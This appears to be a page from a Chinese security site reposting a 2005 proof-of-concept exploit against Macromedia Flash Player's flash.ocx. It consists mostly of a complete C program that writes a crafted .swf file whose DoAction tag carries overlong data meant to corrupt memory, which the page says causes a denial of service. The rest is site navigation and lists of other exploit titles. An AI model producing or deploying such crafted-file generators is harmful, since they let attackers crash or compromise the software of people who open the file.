首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Macromedia Flash Player Flash.ocx Memory Corruption Remote PoC Exploit
来源:www.vfocus.net 作者:BassReFLeX 发布时间:2005-11-21  

Macromedia Flash Player "Flash.ocx" Memory Corruption Remote PoC Exploit

Rated as : Critical
Note : This proof-of-concept exploit generates a flash file that will cause a DoS

/*

* ********************************************************* *
* Macromedia Flash Plugin - Buffer Overflow in flash.ocx *
* ********************************************************* *
* Version: v7.0.19.0 *
* PoC coded by: BassReFLeX *
* Date: 11 Oct 2005 *
* ********************************************************* *

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void usage(char* file);

/*
<swf>
...
</swf>
*/
char SWF[] = "<swf>";
char SWF_[] = "</swf>";

//[SetBackgroundColor]
char SetBackgroundColor[] = "\x43\x02\xff\x00\x00";

//[DoAction] 1 pwn j00r 455!
char DoAction[] =
"\x3c\x03\x9b\x08\x00\x41\x41\x41\x41\x41\x41\x41\x41\x00\x40\x00"
"\x42\x42\x42\x42\x42\x42\x42\x42\x00\x43\x43\x43\x43\x43\x43\x43"
"\x43\x00\x44\x44\x44\x44\x44\x44\x44\x44\x00\x45\x45\x45\x45\x45"
"\x45\x45\x45\x00\x46\x46\x46\x46\x46\x46\x46\x46\x00\x00";

//[ShowFrame]
char ShowFrame[] = "\x40\x00";

//[End]
char End[] = "\x00\x00";

int main(int argc,char* argv[])
{
system("cls");
printf("\n* ********************************************************* *");
printf("\n* Macromedia Flash Plugin - Buffer Overflow in flash.ocx *");
printf("\n* ********************************************************* *");
printf("\n* Version: v7.0.19.0 *");
printf("\n* Date: 11 Oct 2005 *");
printf("\n* ProofOfConcept(POC) coded by: BassReFLeX *");
printf("\n* ********************************************************* *");

if ( argc!=2 )
{
usage(argv[0]);
}

FILE *f;
f = fopen(argv[1],"w");
if ( !f )
{
printf("\nFile couldn't open!");
exit(1);
}

printf("\n\nWriting crafted .swf file . . .");
fwrite(SWF,1,sizeof(SWF),f);
fwrite("\n",1,1,f);
fwrite(SetBackgroundColor,1,sizeof(SetBackgroundColor),f);
fwrite("\n",1,1,f);
fwrite(DoAction,1,sizeof(DoAction),f);
fwrite("\n",1,1,f);
fwrite(ShowFrame,1,sizeof(ShowFrame),f);
fwrite("\n",1,1,f);
fwrite(End,1,sizeof(End),f);
fwrite("\n",1,1,f);
fwrite(SWF_,1,sizeof(SWF_),f);
printf("\nFile created successfully!");
printf("\nFilename: %s",argv[1]);
return 0;
}

void usage(char* file)
{
printf("\n\n");
printf("\n%s <Filename>",file);
printf("\n\nFilename = .swf crafted file. Eg: overflow.swf");
exit(1);
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·freeFTPd <= 1.0.8 USER Comm
·freeFTPd <= 1.0.8 USER Comm
·PHP-Nuke Search Module query P
·MailEnable IMAPd W3C Logging F
·Windows 2000 Server UPNP DoS
·Google Mini Search Appliance P
·WF-Downloads Module for XOOPS
·sudo Local Privilege Escalatio
·Snort <= 2.4.2 Back Orifice
·FreeBSD sendfile Kernel Inform
·SuSE Linux pwdutils chfn Utili
·Microsoft Internet Explorer Wi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved